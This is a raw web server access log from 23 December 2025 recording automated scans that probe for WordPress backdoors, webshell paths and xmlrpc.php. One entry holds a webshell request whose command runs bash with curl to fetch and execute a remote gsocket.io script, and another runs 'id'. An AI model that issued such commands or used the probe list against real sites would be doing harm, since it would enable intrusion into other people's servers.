HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [23/Dec/2025:00:01:06 +0600] "GET /x.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [23/Dec/2025:00:01:08 +0600] "GET /xx.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [23/Dec/2025:00:01:10 +0600] "GET /gifclass4.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [23/Dec/2025:00:01:12 +0600] "GET /radio.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [23/Dec/2025:00:01:12 +0600] "GET /blurbs15.php HTTP/1.1" 301 795 "-" "-" 68.183.191.159 - - [23/Dec/2025:00:01:18 +0600] "GET /class-t.api.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/120.0.0.0 Safari/537.36" 68.183.191.159 - - [23/Dec/2025:00:01:17 +0600] "GET /blurbs.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/120.0.0.0 Safari/537.36" 40.113.19.56 - - [23/Dec/2025:00:01:14 +0600] "GET /gifclass.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [23/Dec/2025:00:01:15 +0600] "GET /wp-admin/css/colors/midnight/about.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [23/Dec/2025:00:01:16 +0600] "GET /nox.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [23/Dec/2025:00:01:17 +0600] "GET /file48.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [23/Dec/2025:00:01:19 +0600] "GET /info.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [23/Dec/2025:00:01:21 +0600] "GET /class9.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [23/Dec/2025:00:01:22 +0600] "GET /la.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [23/Dec/2025:00:01:23 +0600] "GET /bless11.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [23/Dec/2025:00:01:25 +0600] "GET /403.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [23/Dec/2025:00:01:27 +0600] "GET /file9.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [23/Dec/2025:00:01:28 +0600] "GET /ac.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [23/Dec/2025:00:01:30 +0600] "GET /az.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [23/Dec/2025:00:01:31 +0600] "GET /galex.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [23/Dec/2025:00:01:33 +0600] "GET /xb.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [23/Dec/2025:00:01:34 +0600] "GET /vx.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [23/Dec/2025:00:01:36 +0600] "GET /rh.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [23/Dec/2025:00:01:37 +0600] "GET /chosen.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [23/Dec/2025:00:01:39 +0600] "GET /.well-known/acme-challenge/wp-login.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [23/Dec/2025:00:01:40 +0600] "GET /wp-good.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [23/Dec/2025:00:01:42 +0600] "GET /xse25.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [23/Dec/2025:00:01:43 +0600] "GET /wp-admin/includes/index.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [23/Dec/2025:00:01:45 +0600] "GET /wp-includes/index.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [23/Dec/2025:00:01:46 +0600] "GET /wp-signin.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [23/Dec/2025:00:01:47 +0600] "GET /shoyo.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [23/Dec/2025:00:01:49 +0600] "GET /flower.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [23/Dec/2025:00:01:51 +0600] "GET /waq.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [23/Dec/2025:00:01:52 +0600] "GET /wakak.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [23/Dec/2025:00:01:54 +0600] "GET /adminfuns.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [23/Dec/2025:00:01:54 +0600] "GET /wp-includes/wp-class.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [23/Dec/2025:00:01:54 +0600] "GET /wp-includes/widgets/index.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [23/Dec/2025:00:01:55 +0600] "GET /wen.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [23/Dec/2025:00:01:57 +0600] "GET /cwclass.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [23/Dec/2025:00:02:00 +0600] "GET /ah24.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [23/Dec/2025:00:02:02 +0600] "GET /rtx.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [23/Dec/2025:00:02:03 +0600] "GET /bipas.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [23/Dec/2025:00:02:05 +0600] "GET /conte.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [23/Dec/2025:00:02:06 +0600] "GET /class3.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [23/Dec/2025:00:02:08 +0600] "GET /blurbs18.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [23/Dec/2025:00:02:09 +0600] "GET /claa.php HTTP/1.1" 301 795 "-" "-" 103.88.155.32 - - [23/Dec/2025:04:22:25 +0600] "GET /wp-login.php HTTP/1.1" 301 795 "-" "python-requests/2.32.3" 62.164.177.240 - - [23/Dec/2025:05:26:52 +0600] "POST /xmlrpc.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0" 159.223.47.188 - - [23/Dec/2025:06:27:49 +0600] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 795 "http://example.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" 159.223.47.188 - - [23/Dec/2025:06:24:22 +0600] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=id HTTP/1.1" 301 795 "http://example.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" 62.164.177.240 - - [23/Dec/2025:07:11:42 +0600] "POST /xmlrpc.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0" 62.164.177.252 - - [23/Dec/2025:07:15:25 +0600] "POST /xmlrpc.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15" 157.245.206.70 - - [23/Dec/2025:10:26:55 +0600] "GET /wp-admin/css/index.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36" 157.245.206.70 - - [23/Dec/2025:10:28:15 +0600] "GET /wp-content/uploads/2014/07/olx.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36" 157.245.206.70 - - [23/Dec/2025:10:26:02 +0600] "GET /simple.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36" 157.245.206.70 - - [23/Dec/2025:10:26:13 +0600] "GET /xxx.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36" 157.245.206.70 - - [23/Dec/2025:10:26:34 +0600] "GET /wp-content/themes/pridmag/db.php?u HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36" 157.245.206.70 - - [23/Dec/2025:10:27:22 +0600] "GET /radio.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36" 157.245.206.70 - - [23/Dec/2025:10:28:19 +0600] "GET /wp-admin/css/colors/midnight/index.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36" 157.245.206.70 - - [23/Dec/2025:10:26:17 +0600] "GET /tmpls.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36" 157.245.206.70 - - [23/Dec/2025:10:26:39 +0600] "GET /wp-content/themes/seotheme/mar.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36" 157.245.206.70 - - [23/Dec/2025:10:27:08 +0600] "GET /wp-content/plugins/linkpreview/db.php?u HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36" 157.245.206.70 - - [23/Dec/2025:10:27:16 +0600] "GET /ioxi002.PhP7 HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36" 157.245.206.70 - - [23/Dec/2025:10:27:30 +0600] "GET /wp-admin/css/colors/index.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36" 157.245.206.70 - - [23/Dec/2025:10:27:31 +0600] "GET /ofso64.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36" 157.245.206.70 - - [23/Dec/2025:10:28:07 +0600] "GET /wp-content/themes/bltm/wp-login.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36" 157.245.206.70 - - [23/Dec/2025:10:26:08 +0600] "GET /cong.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36" 157.245.206.70 - - [23/Dec/2025:10:26:31 +0600] "GET /wp-cron.php?ac=3 HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36" 157.245.206.70 - - [23/Dec/2025:10:26:46 +0600] "GET /Njima.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36" 157.245.206.70 - - [23/Dec/2025:10:28:01 +0600] "GET /wp-includes/js/crop/uword.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36" 157.245.206.70 - - [23/Dec/2025:10:28:30 +0600] "GET /wp-includes/js/imgareaselect/index.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36" 157.245.206.70 - - [23/Dec/2025:10:28:34 +0600] "GET /wp-includes/PHPMailer/load.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36" 157.245.206.70 - - [23/Dec/2025:10:27:01 +0600] "GET /wp-admin/css/ysirlifn.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36" 157.245.206.70 - - [23/Dec/2025:10:27:26 +0600] "GET /radio.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36" 157.245.206.70 - - [23/Dec/2025:10:27:49 +0600] "GET /wp-content/themes/ccx/index.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36" 157.245.206.70 - - [23/Dec/2025:10:27:55 +0600] "GET /wp-content/uploads/2017-------/09/wp-console.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36" 157.245.206.70 - - [23/Dec/2025:10:28:10 +0600] "GET /autoload_classmap.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36" 157.245.206.70 - - [23/Dec/2025:10:28:26 +0600] "GET /wp-content/plugins/523453244/ninja.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36" 157.245.206.70 - - [23/Dec/2025:10:26:28 +0600] "GET /chosen.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36" 157.245.206.70 - - [23/Dec/2025:10:26:50 +0600] "GET /wp-admin/images/Mhbgf.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36" 157.245.206.70 - - [23/Dec/2025:10:27:03 +0600] "GET /repeater.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36" 157.245.206.70 - - [23/Dec/2025:10:27:38 +0600] "GET /wp-content/plugins/TOPXHOH/wDR.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36" 157.245.206.70 - - [23/Dec/2025:10:28:22 +0600] "GET /wp-content/uploads/2020/wp-couldent.php.suspected HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36" 157.245.206.70 - - [23/Dec/2025:10:26:21 +0600] "GET /wp-content/themes/travelscape/json.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36" 157.245.206.70 - - [23/Dec/2025:10:27:44 +0600] "GET /wp-content/plugins/IOptimize.php?rchk HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36" 157.245.206.70 - - [23/Dec/2025:10:29:00 +0600] "GET /xx.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36" 157.245.206.70 - - [23/Dec/2025:10:29:29 +0600] "GET /wp-content/mah.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36" 157.245.206.70 - - [23/Dec/2025:10:30:16 +0600] "GET /wp-l0gin.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36" 157.245.206.70 - - [23/Dec/2025:10:30:24 +0600] "GET /wp-l0gin.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36" 62.164.177.252 - - [23/Dec/2025:10:43:31 +0600] "POST /xmlrpc.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0" 157.245.206.70 - - [23/Dec/2025:10:28:47 +0600] "GET /wp-content/themes/travelscape/json.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36" 157.245.206.70 - - [23/Dec/2025:10:28:51 +0600] "GET /wp-content/themes/travel/issue.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36" 157.245.206.70 - - [23/Dec/2025:10:29:10 +0600] "GET /epinyins.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36" 157.245.206.70 - - [23/Dec/2025:10:29:34 +0600] "GET /wp-content/item.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36" 157.245.206.70 - - [23/Dec/2025:10:30:06 +0600] "GET /wp-content/themes/travel/issue.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36" 157.245.206.70 - - [23/Dec/2025:10:28:38 +0600] "GET /wp-links.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36" 157.245.206.70 - - [23/Dec/2025:10:29:05 +0600] "GET /wp-content/themes/digital-download/new.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36" 157.245.206.70 - - [23/Dec/2025:10:29:53 +0600] "GET /wp-content/plugins/ph-file-manager/wp-file.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36" 157.245.206.70 - - [23/Dec/2025:10:29:19 +0600] "GET /dropdown.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36" 157.245.206.70 - - [23/Dec/2025:10:30:02 +0600] "GET /wp-content/plugins/wp-help/mini.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36" 157.245.206.70 - - [23/Dec/2025:10:30:20 +0600] "GET /ext.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36" 157.245.206.70 - - [23/Dec/2025:10:28:43 +0600] "GET /wp-aa.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36" 157.245.206.70 - - [23/Dec/2025:10:29:15 +0600] "GET /wp-admin/dropdown.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36" 157.245.206.70 - - [23/Dec/2025:10:29:38 +0600] "GET /wp-content/plugins/shell/about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36" 157.245.206.70 - - [23/Dec/2025:10:30:12 +0600] "GET /wp-content/themes/jaida/lang.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36" 157.245.206.70 - - [23/Dec/2025:10:29:25 +0600] "GET /wp-admin/css/index.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36" 157.245.206.70 - - [23/Dec/2025:10:29:43 +0600] "GET /wp-content/plugins/pwnd/pwnd.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36" 157.245.206.70 - - [23/Dec/2025:10:29:55 +0600] "GET /wp-content/plugins/root-file-manager/wp-file.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36" 157.245.206.70 - - [23/Dec/2025:10:28:56 +0600] "GET /about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36" 157.245.206.70 - - [23/Dec/2025:10:29:47 +0600] "GET /wp-content/plugins/fix/up.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36" 147.185.132.126 - - [23/Dec/2025:11:01:25 +0600] "GET / HTTP/1.1" 301 795 "-" "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity" 62.164.177.243 - - [23/Dec/2025:12:34:22 +0600] "POST /xmlrpc.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36" 158.94.208.149 - - [23/Dec/2025:13:31:57 +0600] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 62.164.177.252 - - [23/Dec/2025:13:59:09 +0600] "POST /xmlrpc.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15"